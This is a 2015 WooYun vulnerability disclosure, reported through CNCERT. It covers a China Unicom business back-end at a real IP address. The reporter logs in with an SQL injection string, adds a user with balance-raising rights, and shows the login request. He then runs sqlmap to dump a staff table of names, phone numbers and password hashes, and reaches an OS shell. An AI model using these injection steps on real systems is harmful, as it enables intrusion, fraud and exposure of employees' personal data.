当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123791

漏洞标题:运营商安全之中国联通业务后台弱口令(可加钱)+sa权限注入

相关厂商:中国联通

漏洞作者: DloveJ

提交时间:2015-06-30 20:21

修复时间:2015-08-17 09:44

公开时间:2015-08-17 09:44

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-30: 细节已通知厂商并且等待厂商处理中
2015-07-03: 厂商已经确认,细节仅向厂商公开
2015-07-13: 细节向核心白帽子及相关领域专家公开
2015-07-23: 细节向普通白帽子公开
2015-08-02: 细节向实习白帽子公开
2015-08-17: 细节向公众公开

简要描述:

跟管管侠步伐。。

详细说明:

0x00

http://220.250.65.185/Index.aspx


这个后台可以被爆破。。
但其实是admin'or'1'='1口令进入。。
先看看有什么功能

1.jpg

2.jpg

3.jpg


0x01
然后在这里

4.jpg


点击查询的同时

5.jpg


response会有员工信息。

mask 区域
*****ot;UserID":"songwenjian","UserName":"宋文健","Password":"e6c8ed90d1fcd477fc3c659a78c71811","IsNeedOrderManage":"N","IsNeedReportManage":"Y","IsNeedProductManage":"N","IsNeedCusManage":"N","IsNeedAccountManage":"Y","IsNeedUserManage":"N","IsDel":"N","CreateDt":"\/Date(1423818313000+0800)\/","Telephone":"1"},{"ID":4,"UserID":"baibing","UserName":"白冰","Password":"e6c8ed90d1fcd477fc3c659a78c71811","IsNeedOrderManage":"N","IsNeedReportManage":"Y","IsNeedProductManage":"Y","IsNeedCusManage":"Y","IsNeedAccountManage":"N","IsNeedUserManage":"N","IsDel":"N","CreateDt":"\/Date(1423818186000+0800)\/","Telephone":"18601106560"},{"ID":3,"UserID":"luying","UserName":"卢颖","Password":"0d0589cd78709802a64a9a4580ae6789","IsNeedOrderManage":"Y","IsNeedReportManage":"Y","IsNeedProductManage":"Y","IsNeedCusManage":"Y&*****


mask 区域
*****密码*****


0x02
下面是加价钱。
我们添加一个用户

6.jpg


7.jpg


8.jpg


9.jpg

10.jpg


ps我已经把加的那个号停用了。
0x03
登陆出抓包

POST /Login.aspx HTTP/1.1
Host: 220.250.65.185
Proxy-Connection: keep-alive
Content-Length: 37
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://220.250.65.185
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://220.250.65.185/Login.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Type=DoLogin&UserID=admin&Password=ad


sqlmap

11.jpg


current database:    'Unicom_FlowManage'
available databases [7]:
[*] Biz_NFDPriceTest
[*] DataServiceCenter
[*] master
[*] model
[*] msdb
[*] tempdb
[*] Unicom_FlowManage
| ??? | 23d1814db536145f94aa605f815b5a57 | 18601106528 |
| 10 | ?? | 68e91dc1973dc2178a375e3bca88d742 | 13522274096 |
| 11 | ??? | 68e91dc1973dc2178a375e3bca88d742 | 13501091884 |
| 2 | ??? | e6c8ed90d1fcd477fc3c659a78c71811 | 18601106535 |
| 3 | ?? | 0d0589cd78709802a64a9a4580ae6789 | 118601107665 |
| 4 | ?? | e6c8ed90d1fcd477fc3c659a78c71811 | 18601106560 |
| 5 | ??? | e6c8ed90d1fcd477fc3c659a78c71811 | 1 |
| 6 | ?? | e6c8ed90d1fcd477fc3c659a78c71811 | 1 |
| 7 | ?? | e6c8ed90d1fcd477fc3c659a78c71811 | 15601206983 |
| 8 | ??? | e6c8ed90d1fcd477fc3c659a78c71811 | 18601001288 |
| 9 | ??? | 173d92f1ddf25e9829f44341401fa0ee | 18701624225 |
+----+----------+----------------------------------+--------------+


12.jpg


sqlmap cmd

13.jpg


command standard output:
---
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 169.254.95.120
IPv4 ?? . . . . . . . . . . . . : 192.168.25.202
???? IPv6 ??. . . . . . . . : fe80::ad82:e5a9:7a7:672a%23
????? DNS ?? . . . . . . . :
???? . . . . . . . . . . . . : ?????
???? . . . . . . . . . . . . : ?????
???? . . . . . . . . . . . . : ?????
???? . . . . . . . . . . . . : ?????
???? . . . . . . . . . . . . : ?????
???? . . . . . . . . . . . . : ?????
???? . . . . . . . . . . . . : ?????
???? . . . . . . . . . . . . : ?????
???? . . . . . . . . . . . . : ?????
????. . . . . . . . . . . . . :
????. . . . . . . . . . . . . :
????. . . . . . . . . . . . . :
????. . . . . . . . . . . . . :
????. . . . . . . . . . . . . :
????. . . . . . . . . . . . . :
????. . . . . . . . . . . . . :
????. . . . . . . . . . . . . : 192.168.25.254
???? . . . . . . . . . . . . : 255.255.255.0
Windows IP ??
Windows IP ??
????? isatap.{286E22C4-AA4F-4482-9B3E-4B728074EF4E}:
????? isatap.{41BF5F06-D821-443C-A314-49ABA31C8C65}:
????? isatap.{49F8F711-121B-4987-B2C9-8A5C3D2AA8CF}:
????? isatap.{8DB27050-BDB0-464D-ACE0-57ACB1404659}:
????? Teredo Tunneling Pseudo-Interface:
?????? ???? 2:
?????? ???? 5:
?????? ???? 7:
?????? ????:


cmd查出远程端口220.250.65.185:7389
<code>
加不了用户

14.jpg


<code>command standard output:
---
========================= ======== ================ =========== ============
========================= ======== ================ =========== ============
BacsTray.exe 3304 2 8,456 K
cmd.exe 3488 Services 0 5,620 K
conhost.exe 5428 Services 0 5,736 K
conhost.exe 6864 Services 0 6,800 K
conhost.exe 8468 Services 0 5,820 K
csrss.exe 908 Services 0 9,472 K
csrss.exe 968 Console 1 8,860 K
csrss.exe 8592 2 15,492 K
DistributedCacheService.e 1524 Services 0 2,250,304 K
dwm.exe 9184 2 7,820 K
explorer.exe 6664 2 66,828 K
fdhost.exe 5420 Services 0 14,392 K
fdlauncher.exe 5300 Services 0 8,432 K
InetMgr.exe 9924 2 56,056 K
LogonUI.exe 972 Console 1 19,476 K
lsass.exe 380 Services 0 73,120 K
lsm.exe 428 Services 0 9,668 K
mmc.exe 6508 2 74,512 K
msdtc.exe 8056 Services 0 10,536 K
MsDtsSrvr.exe 1856 Services 0 42,404 K
MtxHotPlugService.exe 9000 2 6,672 K
MxUp.exe 6224 2 24,080 K
rdpclip.exe 6612 2 12,096 K
services.exe 432 Services 0 17,036 K
smss.exe 748 Services 0 2,548 K
SMSvcHost.exe 2236 Services 0 31,160 K
spoolsv.exe 1436 Services 0 20,664 K
sppsvc.exe 8816 Services 0 12,976 K
SQLAGENT.EXE 11072 Services 0 7,340 K
sqlservr.exe 1520 Services 0 18,540 K
sqlservr.exe 2052 Services 0 667,512 K
sqlwriter.exe 2616 Services 0 10,888 K
Ssms.exe 6504 2 220,632 K
svchost.exe 560 Services 0 16,964 K
svchost.exe 612 Services 0 53,196 K
svchost.exe 616 Services 0 12,240 K
svchost.exe 828 Services 0 117,856 K
svchost.exe 1056 Services 0 21,032 K
svchost.exe 1112 Services 0 27,728 K
svchost.exe 1152 Services 0 31,896 K
svchost.exe 1296 Services 0 18,392 K
svchost.exe 1816 Services 0 12,872 K
svchost.exe 2588 Services 0 5,940 K
svchost.exe 2664 Services 0 18,292 K
svchost.exe 4668 Services 0 13,276 K
svchost.exe 5240 Services 0 8,596 K
svchost.exe 8028 Services 0 7,684 K
System 4 Services 0 364 K
System Idle Process 0 Services 0 24 K
taskeng.exe 6240 2 9,676 K
taskhost.exe 5824 2 9,484 K
tasklist.exe 11192 Services 0 9,928 K
TrustedInstaller.exe 7804 Services 0 174,144 K
w3wp.exe 9148 Services 0 333,176 K
wininit.exe 960 Services 0 7,932 K
winlogon.exe 1000 Console 1 9,152 K
winlogon.exe 2496 2 11,812 K
WmiPrvSE.exe 5028 Services 0 18,616 K
zabbix_agentd.exe 2700 Services 0 21,912 K
???? PID ??? ??# ????
---
os-shell>


就到这里结束了。
话说cmd下可以下载木马??我没敢尝试。。

漏洞证明:

修复方案:

版权声明:转载请注明来源 DloveJ@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-07-03 09:42

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无